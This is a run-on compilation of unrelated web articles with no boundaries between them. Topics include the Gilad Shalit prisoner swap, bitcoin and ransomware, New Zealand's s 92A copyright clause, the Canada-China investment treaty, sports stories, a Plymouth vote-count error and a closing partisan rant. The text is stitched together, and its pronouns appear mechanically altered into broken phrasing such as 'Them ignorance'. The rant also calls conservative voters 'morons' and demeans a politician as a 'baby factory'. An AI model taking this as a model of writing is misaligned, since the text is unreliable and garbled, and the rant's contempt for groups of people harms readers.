Noam Shalit declared that “the prime minister has no mandate to sentence Gilad to death.” Yet as I recall, the prime minister was given the mandate to safeguard the lives of Israeli citizens. They must ensure our future safety. Will they give in to the pressure exerted by advertising agencies? What will they be telling a mother whose children are murdered by a terrorist freed for Shalit? After all, we all know that some of the released prisoners will resume their terror activities.
Don't capitulate
I remember the days I was certain that “it won't happen to me.” After all, we live in Haifa, and there are no terror attacks here. I remember the face of my daughter, Tal, in their coffin on March 6, 2003, moments before they were laid to rest. I remember how I stood by their grave, evening came and a slight drizzle followed. I recall the gaze of Minister Sandberg, the government representative at the funeral, yet I do not remember their words from that terrible day where I saw Tal for the last time. I assume that they too spoke about the IDF's long arm, about our social strength, and about the establishment's duty to bring justice to the attack's masterminds.
I'm not concerned about Tal today; even terror cannot harm my Tal. Yet what about my children and family, will they be protected when hundreds of experienced and motivated killers leave prison? I shall never forget the attack mastermind's interview with British television, filmed in prison, where they bragged that they will not serve their full term and will be released earlier.
After five years, no argument has been raised in favor or against the swap, which threatens the lives of Israeli citizens. The facts are on the ground, and questions that have remained unanswered mark the failure of security forces, who have not been able to locate and release Gilad.
Through wise thinking, without emotional caprices, we must prompt the enemy to release Shalit without capitulating to its humiliating demands. Israel must make it clear that only one terrorist shall be released for Shalit. With a heavy heart, I am willing to see the despicable man who planned my daughter's murder and bragged in the interview go free. Releasing one terrorist, without capitulating, will prevent bloodshed, murders and abductions, sparing the lives of many Israelis.
Ron Kehrmann is the father of Tal, who was murdered in the terror attack on bus route 37 in Haifa, in March 2003
Amid a flurry of negative publicity for bitcoin, technology advocates are trying to distance themselves from the digital currency as part of a bid to protect the perception of more enterprise-facing blockchain initiatives.
The change of public positioning follows an uptick in ransomware attacks using bitcoin as the medium of payment, the most recent of which (after causing major disruption within the UK's National Health Service and elsewhere) has sparked a global conversation.
At a briefing for congressional staff on Tuesday covering the potential uses of blockchain technology in the US healthcare system, the Chamber of Digital Commerce and a panel of other blockchain specialists acknowledged that the ransomware issue is again opening old wounds caused by the technology's association with illicit uses of bitcoin and cryptocurrencies.
In response, panelists sought to draw clear lines between the two technologies.
“A lot of these initial attacks have been on healthcare systems and healthcare companies. This has come onto our radar because the ransomware is asking for the ransom in bitcoin,” Perianne Boring, president of the Digital Chamber of Commerce, told an audience of roughly 70 healthcare and technology-focused staffers from congressional offices.
Elsewhere, the panelists sought to categorize bitcoin as merely “one application” of blockchain technology.
Srinivas Attili, senior vice president and partner at IBM Global Business Services, told attendees:
“Blockchain [gets] a lot of bad rap because of bitcoin, in my view. Bitcoin is just one application of blockchain, and you can have hundreds of applications of blockchain.”
Blockchain good, bitcoin bad
Just how much regulatory attention is being aimed at bitcoin in the wake of the incidents is unclear, though a member of Congress introduced a bill Tuesday ordering the Department of Homeland Security to conduct a threat assessment regarding the use of virtual currencies by terrorists and criminals.
It's happened before, so advocates worry bitcoin's bad press will rub off on blockchain.
Attili drew the comparison to Amazon being just one among a countless number of businesses built on the HTTP protocol, and highlighted Hyperledger as a promising blockchain technology suite that they believe is isolated from any nefarious activity associated with cryptocurrencies.
“It's built for business. There's no concept of cryptocurrencies on Hyperledger,” they said.
Yet, Micah Winkelspecht, chief executive of Gem, a blockchain solutions company, did defend bitcoin, asserting that it's serving a legitimate use as a means of exchanging value.
Winkelspecht said:
“Bitcoin is to those types of attacks as the dollar is to the drug trade. Just because the dollar exists doesn't mean that it's the cause of the drug trade. Bitcoin is just a tool that these criminals are using because it is a good form of exchanging value. It's actually serving a really good purpose as an exchange of value. They are leveraging it as a tool.”
“Blaming bitcoin for ransomware would be like blaming the Federal Reserve for any illicit transaction that happens in cash,” Boring added.
Recasting the narrative
Still, the damage dealt by the ransomware attacks, compounded by past black eyes like Mt Gox and Silk Road, may cut deeper than many in the cryptocurrency community may wish to recognize.
Congressional staffers speaking privately after the event said the concept of blockchain must be, to all intents and purposes, disassociated from bitcoin to gain serious traction in the legislative arena.
Boring tried to flip the narrative by saying that, instead of blaming bitcoin for the attacks, there should be greater focus on the potential of blockchain to protect against ransomware and other cyberattacks in the future.
They said:
“I would even argue that when we talk about protecting our healthcare systems or other systems that might be vulnerable to ransomware or other types of cyberattacks, that blockchain technology could be the silver bullet to protecting our infrastructure.”
Winkelspecht concurred, arguing that blockchain could provide a better, more secure way to store data as hackers become more sophisticated in the future.
“Before, we used to see attacks that were more DDoS – they were attacks on infrastructure trying to bring systems down,” they said. “Now we're starting to see more infiltration. They're basically putting a ransom on data because that data is so valuable and they know that people will pay to unlock it.”
Winkelspecht predicted that the next phase of cyberattacks will be “data integrity” attacks that involve breaking into a system and actually altering existing data in a way that “tricks” downstream systems.
“Those are the most dangerous and potentially the most costly types of attacks because you may not know it's happening for literally years,” they explained.
The immutability of blockchain technologies, though, could be the only true line of defense against such intrusions, they said adding:
“One of the things that blockchains can provide is an immutable proof of data integrity. We can guarantee beyond a shadow of a doubt that data has not been modified or changed.”
Washington, DC, image via Shutterstock
DENVER, CO - AUGUST 23: Quarterback Peyton Manning #18 of the Denver Broncos runs the offense against the Houston Texans during a preseason game at Sports Authority Field at Mile High on August 23, 2014 in Denver, Colorado. (Photo by Justin Edmonds/Getty Images)
DENVER (CBS HOUSTON) – During the Texans 18-17 win over the Broncos Saturday night Peyton Manning led the Broncos to two touchdown drives in the final two minutes of the first half. Both passes to Emanuel Sanders. After the second touchdown, to give the broncos a 17-7 lead Manning went up to Swearinger and tapped their helmet on the 2nd year safety. The two jawed at each other as they went off the field.
A source has told SportsRadio 610 that Manning said two simple words to Swearinger, “F*** You.” DJ Swearinger has also confirmed that that is exactly what Manning told him.
The discontent might have started during the week while the Texans and Broncos practiced together at the Broncos training facilities.
During the dual team practices during the week in Dove Valley, Colorado Houston Texans safety DJ Swearinger was in the middle of a few dust ups on the practice field. After one practice Swearinger claimed the reason for the fights were that they picked off the future hall of famer.
LATEST SPORTS STORIES:
Thanks to an impressive campaign spearheaded by Creative Freedom NZ, New Zealand's controversial 'guilt upon accusation' clause, s 92A, will be delayed and may be suspended and may be abandoned.
Section 92A is a graduated response provision that requires ISPs to “adopt and reasonably implement a policy that provides for termination, in appropriate circumstances, of the account with that Internet service provider of a repeat infringer.”
Unfortunately, the definition of 'repeat infringer' is not clearly defined. The provision states that “repeat infringer means a person who repeatedly infringes the copyright in a work by using 1 or more of the Internet services of the Internet service provider to do a restricted act without the consent of the copyright owner.”
This wording is familiar - it is almost word for word identical to the Australian limitation on safe harbours in s 116AH, which provides that “The carriage service provider must adopt and reasonably implement a policy that provides for termination, in appropriate circumstances, of the accounts of repeat infringers.”
There has been an incredible showing of online protest at the forthcoming introduction of s 92 in New Zealand, and a lot of international support. We at EFA are heartened by the change that New Zealanders have been able to achieve. This is a notable victory for users, and is very encouraging for similar action worldwide.
Section 92 hasn't been repealed yet, however. The next step for New Zealand is to agree on a code of practice for the large ISPs. TCF have released a draft code of practice with some guidelines as to how ISPs should interpret the legislation.
10. To establish any Infringement, the Copyright Holder must provide a Party with evidence that that Party considers, in its sole discretion, would be sufficient to satisfy a Court that an Infringement under the Act has taken place. 11. Examples of evidence which would be sufficient include: 11.1 a judgement of a Court (interim or final) finding Infringement under the Act; 11.2 a Copyright Holder Notice which complies with this Code; 11.3 such other evidence as that Party is prepared, in its sole discretion, to accept would be sufficient to satisfy a Court that an Infringement under the Act has taken place.
The draft guidelines establish a three-strikes regime, with 'strikes' expiring after 18 months. If a user receives three 'education notices' in different months within a year and a half, a final warning is to be sent, and the account terminated within 48 hours.
Under the draft code, the user has a right of reply within three months of being served with a warning. As written, the guidelines appear to provide no mechanism for adjudicating on whether a user's 'counter-notice' is valid or not. This is, of course, understandable - an ISP is not a court of law or an otherwise competent trier of fact, and does not have either the resources, the training, or the procedural framework in place to determine whether a copyright infringement claim has been correctly made out and whether a defence has been correctly raised and made out. The effect, however, is that the termination provisions are practically useless - termination under the guidelines is only possible upon receipt of three uncontested warnings. If users are careful to contest each warning - effectively, legitimately putting the copyright holder to proof - then disconnection is no longer possible under the code.
Remember, this is a draft code, and such a construction is likely to be criticised by copyright lobbyists. But it raises a very real question for policymakers. If we are going to terminate accounts upon suspicion of copyright infringement, we have to ask ourselves what level of due process we are willing to sacrifice. If we decide that due process is important to us, that households ought not be disconnected without a right of reply and a decision from a competent trier of law and fact, then the graduated response scheme is overly complicated, costly, and ineffective.
The only realistic way to make a graduated response scheme effective would be to do away with due process. It would require entrusting ISPs to make decisions about whether three separate infringements have in fact taken place. In reality this means that risk averse ISPs will be likely to agree with the copyright owner, because the costs and difficulties of investigating the claims will be higher than their potential liability for wrongly disconnecting users. (We could impose liability for wrongful disconnections on the ISPs, but that really just exacerbates their delicate situation - not being competent to evaluate questions of law and fact, they will be liable from either copyright owners or users for nearly all of their decisions.)
I don't think we're prepared to accept a situation where there is no due process. The dangers are too high. The internet is far too important a tool for communication to be held to ransom by copyright owners for the alleged infringement of private rights.
So this leaves us in an interesting position. Is there any compromise we could reach that would allow us to be comfortable with the risk to users? I'm not convinced that there is a workable graduated response system. Fundamentally, this is about lowering enforcement costs by removing copyright infringement proceedings from the courts. But every time you remove copyright infringement from the judicial system, you lose the safeguards that have been developed over centuries that we now take for granted - the right to confront an accuser, the burden of proof resting with the party alleging infringement, the evidentiary rules that ensure fair trials, the impartiality of the judiciary, the openness of legal process. Without those safeguards, of course enforcement costs will be lowed - but so too will confidence in the system and security of individual rights under law.
I think we need to start looking for other solutions. Copyright taxes are an interesting idea that we don't talk about enough, for example. And of course, there's always the possibility that the copyright lobby will realise that there are still plenty of ways to make money by giving users what they want, rather than seeking more aggressive, costly, inefficient, and unworkable legislative changes.
The delay in the NZ law is a good sign, but there are still many more problems. The current case before the Federal Court between AFACT and iiNet will examine what responsibility ISPs have under Australian law, which already includes a provision requiring termination of repeat infringers. The upcoming ACTA negotiations, though delayed by the change in US administration, may see a wider adoption of graduated response mechanisms. We need to be critical here, and determine exactly what we are prepared to sacrifice in order to lower copyright enforcement costs. If we decide that we're not prepared to sacrifice either due process or the right to read and communicate on the internet, then there is still a lot of work ahead.
[ cross posted to Nic's blog ]
On Wednesday I published a chart showing Chauncey Billups' career win shares compared to the players acquired for them by trade. Of course, Mr. Big Shot was once dealt for Allen Iverson, so Iverson appears on the chart just under Billups. The mere presence of A.I. below a contemporary on a chart led to some debate about whether Iverson was actually a lesser player than Billups, which should be a reasonable discussion to have.
But because it's Iverson, nothing is reasonable.
The Answer is one of two modern players for whom Internet debate is basically useless. (The other is Kobe.) There are certain people on the Internet for whom A.I. ranks among the best guards ever, a living legend and a player behind only Kobe, Duncan and Shaq in their era. These are people that respond to a chart that places Billups over Iverson based on an admittedly arcane statistic by literally laughing out loud and pointing out what they see as a major gaffe.
Then there are certain people who think Iverson is not just overrated, but wildly overrated. These are usually stats people. Iverson was not the most efficient player in the league despite huge scoring and assists numbers. Some fans and analysts are so committed to efficiency as the highest priority that they'll argue Iverson was no better than an average player with above-average opportunities. One prominent stats writer claimed Iverson was the 91st-most productive player in the league the year they won MVP. That same stats writer was heavily endorsed by Malcolm Gladwell, so their position won a lot of extra cachets.
There are a number of folks that feel similar, though less strident on the subject. Some might be surprised that Iverson landed so close to Billups on that chart.
A widespread difference of opinion about a player is not rare, especially in the Hot Take era. But pro-Iverson and anti-Iverson folks aren't even speaking the same language. Even otherwise reasonable writers take up arms when Iverson is the topic, as if they are the talisman to the greater debate about the importance of shooting efficiency and the value of data. Note that I'm purposely not linking to any of the hot takes one way or the other. Like I'm saying, the debate is not useful and actually might be destructive.
The reality is that while Iverson captured and has held our imaginations like few others, what you think about A.I. as a player need not be polemic. As a data-friendly writer and fan, I tend to think that efficiency does matter quite a bit. But I also recognize the value of shot creation, of taking a huge load. Iverson's Finals team is a perfect example of this issue: how much did Larry Brown benefit from being able to rely on A.I. taking 30 shots a game, freeing up other rotation spots for elite defenders?
But the Iverson debates, because he's Allen F. Iverson, never allow for that sort of discussion. At least not on the Internet. He's either a legendary scorer without parallel or a ball-hogging chucker of the highest order. On the Internet, there seems to be painfully little gray area.
Until people can take the emotion out of the Iverson they remember, comparing them to anyone else is totally useless. Let's just talk about Nick Young instead.
It's not exactly news that Canada ranks among the world's top five energy producers. Currently, it is the third largest gas producer and holds the third-largest proven oil reserves.
What is new, however, is that Canada for the first time last year became the top destination for Chinese investments abroad, beating out its southern neighbor, the US, the world's biggest economy. While Chinese firms spent more than $20 billion in Canada - almost all of it in the energy sector - the US received just more than $10 billion, according to finance data specialist Dealogic.
A large chunk of the Chinese money went into the contentious $15 billion takeover of Calgary-based Nexen alone, an oil and gas company with major assets in the Canadian oil sands, estimated to contain the third-largest reserves in the world.
The acquisition by state-owned energy concern CNOOC was the largest foreign takeover by a Chinese company ever. While giant deals like Nexen are the exception rather than the rule even for energy-hungry China, they highlight a logical trend: Canada's huge oil and gas sector is increasingly viewed as an attractive target for Chinese investments.
Hushed treaty
The Nexen takeover was China's biggest ever
With the Nexen take-over and China's growing role in Canada's energy sector as a backdrop, it seems only reasonable that an investment deal planned by the Canadian government with Beijing would lead to vigorous parliamentary and public debate.
And it has, sort of.
Until the signing of its bilateral investment treaty with China on the last day of an Asia-Pacific summit in the Russian city of Vladivostok in September 2012, the Canadian government had not published the specifics of the Foreign Investment Promotion and Protection Agreement (FIPA). That only happened some two weeks later when the deal was disclosed in parliament.
But even then - after the treaty was already inked - a real parliamentary debate about its merits didn't get off the ground thanks to a unique quirk in Canada's political system that grants the executive the formal ratification power of treaties. In practice, that means that all the government of Prime Minister Stephen Harper needs to do to ratify the treaty is make a cabinet decision after letting the FIPA sit in parliament for three weeks. Canada's parliament is practically shut out off the whole process and has no official vote in it.
With the waiting period long expired, formal ratification by the Harper government could come any day. In a last ditch effort this week to block the treaty, a divided opposition forced a vote that would have nixed the deal, but the move was clearly defeated in parliament.
Done deal
So it's looking increasingly likely that the Sino-Canadian investment deal will go through, despite opposition that includes environmentalists, native Canadians and regional politicians. Essentially, their shared concern was and is that the FIPA violates Canada's best national interests and unduly favors China.
The Canadian government argues that this FIPA is basically no different than any of the 24 deals already in place with countries like Russia, Venezuela or Egypt. Proponents also point to the fact that many other industrialized countries like Germany have similar bilateral investment pacts with Beijing. They say the goal of this as of all the other treaties is to make it easier and safer for Canadian businesses to invest in China's rapidly evolving economy.
The deal was signed at at last year's APEC meeting
"Critics fixate on Chinese investment in Canada but never think about Canadian investment in China and the protection the FIPA will provide," says Armand de Mestral, emeritus law professor at Montreal's McGill University.
In 2011 Canadian companies invested $4.5 billion in China, according to the Canada China Business Council. While Canadian investments in China are expected to grow, it appears unlikely that they will keep pace with possible investments by Chinese firms in Canada - particularly in the country's energy and natural resources sectors.
Crucial mistakes
Critics of the deal argue that this treaty due to the sheer size of China and its economic power makes it different than any other FIPA signed by Ottawa. They also highlight what they perceive as the two major flaws of the treaty: duration and secrecy.
Its guaranteed lifespan of 15 years sets the Canada-China FIPA apart from other treaties. "The requirement in article 35 that termination not be possible for the first 15 years is unusual," notes David Gantz, director of the International Trade Law Program at the University of Arizona in Tucson. "Most permit termination at any time subject to six months' or one year's notice."
To compare, NAFTA, arguably Canada's most important trade deal, allows termination at any time with just six months notice. The fact that this FIPA will effectively bind future Canadian governments to the deal for at least 15 years with no way out is unacceptable, say critics.
Shrouded in secrecy
They consider the treaty's focus on secrecy its second major flaw.
The Canada-China FIPA, like similar treaties, establishes an arbitration process to resolve legal issues instead of going through the courts. In practice, that means any disputes between two parties will be decided by an external three-person panel. While some critics reject the arbitration process as a whole because it foregoes the traditional court system, it is a regular and established feature used in most international trade and investment treaties.
Critics call the tar sands project an eco-disaster
But here again, the Canada-China FIPA deviates in one important aspect from Canada's previous treaties. In contrast to Canada's traditional stance of openness in its FIPAs, all Canada-China arbitration cases - except the decision - are private.
"Canada's longstanding practice in investment arbitrations is to conduct the proceedings in a highly transparent manner," explains Gantz. "China presumably has different views and under article 28 (of the treaty - the ed.) is not required to allow the proceedings against them (other than the decision) to become public."
That means that Ottawa can make arbitration cases against Canada public while Beijing can keep cases against China under wraps.
Chinese norms
"For example, an arbitration hearing for a Canadian investor in China claiming damages would be private unless China decided it was in the public interest to make it public," write Patrick Gervais and Nailah Gordon-Decicieo in an analysis of the FIPA deal published in November 2012 by Toronto law firm Blaney McMurtry. "This is a departure from the general Canadian standard in other bilateral investment treaties and is more in sync with Chinese norms."
The arbitration process coupled with the treaty's focus on secrecy has critics worried that Chinese companies could sue Ottawa should Canada decide to impose tougher environmental or public health laws that could hurt Chinese business interests. To counter that threat, the annex of the treaty contains a passage that is supposed to shield governments from investor claims regarding non-discriminatory actions to regulate the environmental and protect public health and safety, says Gantz. Still, this may not be enough:
"In the case of this treaty critics believe, probably accurately, that the agreement will encourage Chinese investment in natural resource development in Canada, activities which typically raise environmental concerns as with such projects as the XL pipeline and the Alberta oil sands development."
Canada's Green Party has called the treaty "the sellout to China" while citizen rights group Council of Canadians has branded it as "one of the most fundamentally anti-democratic, anti-worker, anti-environment and anti-Indigenous rights deals since NAFTA."
Premier Harper will decide when to ratify the treaty
All eyes are now on Prime Minister Harper. Perhaps they are waiting for the resolution of a remaining legal injunction against FIPA by the Hupacasath First Nation which claims the government did not consult Native Canadians before signing the treaty. A decision is expected in June.
Regardless of the outcome, Armand de Mestral who favors the deal, cautions against what they describe as simply calling wolf over fears of Chinese interests in Canada: "I think Canada retains sufficient regulatory control under the terms of this treaty to protect its national interests. People said much worse about NAFTA and Canada is still a sovereign country."
56.9k SHARES THIS STORY
It takes real leadership to stand in the face of terror and unspeakable violence, to refuse to engage with the fear and hold firm to the values you held before. The horrific violence in Paris rightfully gave pause to many immigration advocates; but now that it is clear that the identifiable terrorists were residents and the “Syrian refugee passports” found on the bodies were in fact Turkish fakes, President Hollande of France has refused to listen to the tsunami of xenophobic bloodlust sweeping through the right-wings in both American and France and has declared that France will still be accepting 30,000 Syrian refugees over the next two years – an increase of 6,000 from the original proposal.
“Life should resume fully. What would France be without its museums, without its terraces, its concerts, its sports competitions? France should remain as it is. Our duty is to carry on our lives. Some people say the tragic events of the last few days have sown doubts in their minds. Through terror, Daesh (ISIS/ISIL) wants to instill through their murders the poison of suspicion, of discrimination, of division…It is as much of our humanitarian duty to help the refugees as it is to ensure the protection of France. 30,000 refugees will be welcomed over the next two years. Our country has the duty to respect this commitment. We will continue to take the necessary precautions before accepting refugees on our soil. It's what we've been doing and what we will continue to do. Our social cohesion is the strongest response and our national unity is its expression. We must remain steadfast against all forms of hate. No xenophobic, anti-Semite, or anti-Muslim acts will be tolerated.”
Hollande has taken a decisive stand against both the terror from abroad and the discriminatory fearmongering from the right, a pronouncement of reason and rationality in the face of chaos. The George W. Bush administration utterly failed to do this after 9/11, becoming so consumed by fear that they began sacrificing our liberties and values in the name of national security – warrantless surveillance, religious discrimination, censorship, and torture. On the other hand, President Hollande has accepted the facts and has proceeded in a calm and measured manner, in complete opposite to the American Republicans who have seized on an attack in another country as a “national security” excuse to step up their anti-Muslim rhetoric, which is naught but barely disguised racism. We applaud President Hollande for not playing into the hands of ISIS and forging a progressive response to such abominable acts of terror.
Download our NEW Occupy Democrats app for your iPhone by clicking here or for your Android by clicking here.
Add your name to millions demanding that Congress take action on the President's crimes. IMPEACH DONALD TRUMP!
Cinebench 11.5 is based on the Cinema 4D Suite, a software that is popular to generate forms and other stuff in 3D. The single-core test only uses one CPU core, the amount of cores or hyperthreading ability doesn't count.Cinebench 11.5 is based on the Cinema 4D Suite, a software that is popular to generate forms and other stuff in 3D. The multi-core test involves all CPU cores and taks a big advantage of hyperthreading.Cinebench 11.5 is based on the Cinema 4D Suite, a software that is popular to generate forms and other stuff in 3D. The iGPU test uses the CPU internal graphic unit to execute OpenGL commands.Cinebench R15 is the successor of Cinebench 11.5 and is also based on the Cinema 4 Suite. Cinema 4 is a worldwide used software to create 3D forms. The single-core test only uses one CPU core, the amount of cores or hyperthreading ability doesn't count.Cinebench R15 is the successor of Cinebench 11.5 and is also based on the Cinema 4 Suite. Cinema 4 is a worldwide used software to create 3D forms. The multi-core test involves all CPU cores and taks a big advantage of hyperthreading.Some of the CPUs listed below have been benchmarked by CPU-monkey. However the majority of CPUs have not been tested and the results have been estimated by a CPU-monkey's secret proprietary formula. As such they do not accurately reflect the actual Passmark CPU mark values and are not endorsed by PassMark Software Pty Ltd.Geekbench 3 is a cross plattform benchmark that heavily uses the systems memory. A fast memory will push the result a lot. The single-core test only uses one CPU core, the amount of cores or hyperthreading ability doesn't count.Geekbench 3 is a cross plattform benchmark that heavily uses the systems memory. A fast memory will push the result a lot. The multi-core test involves all CPU cores and taks a big advantage of hyperthreading.
Photo above: jurvetson, Feature photo: tarotastic
After a brief dispute with landowners along the infamous track, the Kokoda Trail is once again open to trekkers.
The Kokoda Trail in Papua New Guinea (PNG) has been getting quite a bit of news as of late. Last month, two trekkers died while trying to complete it. Last week, Kovelo villagers, who felt they hadn't seen the materialization of financial benefits promised by the Australian and PNG governments, blocked the trail. They were demanding $100 from each trekking group to pass.
As reported in this story from the Herald Sun, an agreement was reached which satisfied the villagers, and they have since ended their protest.
Some history about the trail
The Kokoda Trail was made famous during World War II, when the Australian army (the Diggers), eventually aided by the Americans, held off an invading Japanese army. Although the Japanese had the man and weaponry advantage, they weren't prepared for the harsh conditions along this trail, the only route of escape for them.
In the end, the Japanese lost 13,000 out of 20,000 soldiers (contrast that with 6000 casualties on the Australian side).
An account of the trail as it was during WWII can be found at the Digger History website.
The trail today
These days a number of companies operate trekking excursions on the trail. Local guides and porters can also be hired.
It's possible to do the trek independently, but parts of the trail are unmarked and with the extreme temperatures that can be experienced there it's not advisable to go on your own. Depending on your condition, it can take anywhere between five and 12 days.
If you're a glutton for punishment, there's the Kokoda Challenge, where teams of four compete to complete the 96 km course within the unbelievable time limit of 39 hours. All I can say is, good luck with that.
COMMUNITY CONNECTION:
For more treks, make sure to check out these two in Nepal: the Annapurna Sanctuary and the Mt. Kangchenjunga Circuit. Matador editor Tim Patterson also has some great tips for Trekking Central Laos.
Image caption Luke Pollard said they wanted to know "why and who is responsible" for what happened
Thousands of votes were not included in the result for a newly-elected Labour MP, Plymouth City Council has said.
Luke Pollard won Plymouth Sutton and Devonport with 23,808 votes. However, the actual figure including the missed votes cast in their favour was 27,283.
Mr Pollard said the votes from the Efford and Lipson ward were counted in their constituency, but they were not included in the result.
They would still have won comfortably over Conservative Oliver Colvile.
Mr Colvile's official result on Thursday was 17,806 votes. However, with Efford and Lipson added in they won 20,476 votes.
The Electoral Commission has said it will investigate.
Postal votes
It is already probing claims about missing postal votes in Plymouth Sutton and Devonport, in addition to South West Devon and Plymouth Moor View.
A spokesperson said: "The commission is aware of reports of electoral administrative problems in Plymouth and is in contact with the electoral officers who are responsible for delivering the election in these areas.
"We will be reporting on the administration of the polls after the election and will carefully consider these reports as part of that process."
The city council said an "error in a spreadsheet" meant that more than 6,100 votes from Efford and Lipson "were not included in the final declaration sheet for the Plymouth Sutton and Devonport constituency".
A spokesperson said: "We are very sorry that this error has happened. We are making all paperwork and data available to the Electoral Commission and to candidates and agents to inspect."
Image caption Mr Pollard said the votes from the Efford and Lipson ward were counted in their constituency but not included in the result
Mr Pollard said: "It's just another thing to add to the catalogue of mistakes by the council.
"Right from the start the city council has made a series of unforced errors.
"I want to get a sense of what has happened, why and who is responsible.
"They cannot brush this under the carpet."
Phew. After all that angst and concern, it turns out All Blacks fullback Ben Smith hasn't even had a concussion issue at all this season.
No one will be more relieved about that than Smith themselves and their wife Katie, because it means they can now carry on as one of the very best fullbacks that play this game of rugby without wondering if they aren't doing themselves some sort of permanent damage.
All Blacks coach Steve Hansen revealed at the end of their press conference in Auckland on Thursday that Smith's issues this season had in fact been diagnosed as an inner-ear problem, and that they had not actually been experiencing concussion symptoms at all.
HANNAH PETERS/GETTY IMAGES. Ben Smith has been diagnosed with an inner ear problem and cleared of concussion symptoms.
 They are now fully cleared of all symptoms, and has rejoined the team in Auckland, where they were due to join them for their main Tuesday afternoon training session ahead of Saturday's deciding third test against the British and Irish LIons at Eden Park.
READ MORE:
* 'Scuffles' in tense ABs camp
* Gatland expects ABs backlash
* Jordie Barrett's 'baptism of fire'
* Hansen's Hurricane warning
Smith has not been available for selection for the last two tests of this compelling series, with Israel Dagg deputising at fullback last week in Wellington, and 20-year-old rookie Jordie Barrett stepping in for their first test start at No 15 for the Eden Park decider.
"Bender had some tests done over the last seven or eight days in Dunedin, and they have been cleared of concussion," Hansen told a heavily attended press conference at the team's inner-city hotel.
"He doesn't have a concussion problem, and they aren't knocked out
"What they do have is an inner-ear malfunction which was causing them to get a bit of vertigo and dizziness. That has now cleared. He's coming back up and he's going to be around the boys and train today."
Hansen said the clarity around what had been a worrying set of responses to suspected head knocks this season was a major relief for all concerned.
"It's great news for Bender and Katie, and takes a weight off their shoulders knowing what we've deemed to be concussion two or three times this year was actually another problem and they've now been able to identify and medicate and fix."
Smith, who is the All Blacks' vice-captain, left the field in the first test at Eden Park, raising concerns they had been concussed for the third time this season.
The All Blacks continue to take a no-risks approach to anything resembling a head knock among their players.
Despite an All Blacks spokesperson saying previously that there had been no injury issues around the naming of the team for the third test against the LIons, Hansen made a liar out of that person on Thursday by confirming Waisake Naholo had not been considered for selection because of the head knock they had taken during the second test and that Rieko Ioane had also been ruled out because of illness.
"Rieko wasn't considered because he's been crook all week and hasn't been able to train with us, and whilst Waisake passed the protocols for concussion, the doctor and selectors don't feel we should be risking a player so soon after concussion, so we've given them another week to recover," Hansen said.
"We could have played [Naholo] if we really wanted to but concussion is an important thing we and we just want to give them another week to make sure."
by
J.S. Mill said “Not all conservatives are stupid people, but most stupid people are conservatives.” A century and change later, little has changed. Let's drop the niceties and psychobabble and confront the simple fact that the Republican/McCain base are largely morons. Before you say it, yes, I freely acknowledge that supporters of the Republican party and McCain in particular might have IQs that are as much as 10 points higher than those we've seen at their rallies. But none of this refutes Mill's premise, and they are clearly right on this one. People who believe that men walked side by side with Dinosaurs are almost invariably “conservative.” While you could find stupid, ignorant people at an Obama rally, you'd have a hard time finding people who believe McCain is actually Russian plant of a member of the KKK, the rough analog to what we see in the now infamous “he's an Arab” question and a dozen other clips in which Obama is called a terrorist. And in a tough election year, Mill's “stupid people” have become the fulcrum and the face of Republican strategy.
Are these clips an unfair representation of a big piece of the Republican base? We are never short of stupid people, so if most stupid people support McCain and the Republican party, our “conservatives,” then surely these people are a large part of their base. And certainly, this dialogue is played out in the heartland thousands of times a day, without video cameras, camera shyness and youtube becoming involved. There are a lot of morons who support the Republican party, therefore the moron is a crucial part of their base.
Polls have shown that as many as one in ten Americans believe, or claim to believe, that Obama is a Muslim. If we assume that the majority of these people are Republicans and add that to the fact that well under half of America is Republican, the picture of what exactly constitutes the “Republican base” becomes pretty clear. No pollaster has asked how many believe Obama to be a muslin. Quoth the wiki:
Muslin is most typically a closely-woven unbleached or white cloth, produced from corded cotton yarn. Wide muslin is called “sheeting”. It is often used to make dresses or curtains but may also be used to complement foam for bench padding. Muslin breathes well, and is a good choice of material for clothing meant for hot, dry climates.
Now add in those who believe that Obama supports a radical racist and a terrorist movement that happened 40 years ago, on the basis of 90 seconds of clips from their church and attending a coffee event with a guy who blew up a statue. Clearly a large chunk of McCain's support comes from people who believe Obama is a Muslim, a radical black militant, a friend to domestic terrorists and/or a cloth often used to make curtains. And McCain's campaign is reaching out desperately and more importantly, overtly to this real base.
Sarah Palin's role in the campaign has primarily been one of mascot. She's a baby factory who can't be bothered with much reading and research. They have kids to get to hockey practice, poorly aimed, First Dude urine to wipe up and guns to clean. She's like you! And are you gonna let some New York eggheads tell you that you can't be VP and eventually President?!
Part of the reason stupid people are drawn to conservatism is that the intelligent conservatives have always been willing to indulge and support ignorance in order to conserve their own wealth and power. Gomer-Joe gets a mailbox full of direct mail about how Obama is closely woven to terrorists and went to a Muslim school and hours of talk radio on similar subjects so they can wallow in stupidity, fear and hatred. Thurston gets a PO box in Grand Caymen and doesn't have to pay taxes. But it's unlikely that in Mill's day the veneer of conservatism in the public sphere was an open celebration of ignorance. The uneducated and the “stupid people” have not only been catered to here and scared there, in the usual way. Now, they are brought to the forefront. Palin is the culmination of the progress of the stupid conservative from beast of burden, to Red-Nosed Reindeer. Contrary to popular cliche, it's not a Capra movie come to life. Mr. Smith, though naive and idealistic, was fascinated by history and law and triumphed by using their knowledge of them. Palin is the mascot of the functionally illiterate and represents the idea that they should triumph by affirmative action. For the real core of the Republican base, the fact that they won't admit to reading newspapers and knows nothing about the Supreme Court, is a badge of honor. They speak and thinks as they do and is ignorant of the same things. Them ignorance proves that any knowledge beyond that which is possessed by the ignorant or stupid is irrelevant and pretentious. What kind of elitist needs to know much more about politics, law and economics than (eventual) President Palin herself?
Trig has been thrust in as the mascot's mascot. Even when pregnancy plays out in the worst case scenario, it must be carried to term. Trig is waved about as the pro-life flag and an even deeper statement of values. As always, the undercurrent to the pro-life message is that sex for pleasure is to be punished. Sex has consequences. Now, we might be able to prevent many of these consequences like, AIDS and other STDs, HPV, unwanted pregnancy and severely disabled children. But there is always some convoluted reason to prohibit everything from a married couple taking a mulligan , rather than being forced into servitude to a fetus that will one day be a disabled child, to giving a child an HPV vaccine to prevent them from getting cancer one day. God's punishment must be unhindered. And unless you have the means to raise a disabled child yourself, well, you had better not tempt your dad into raping you.
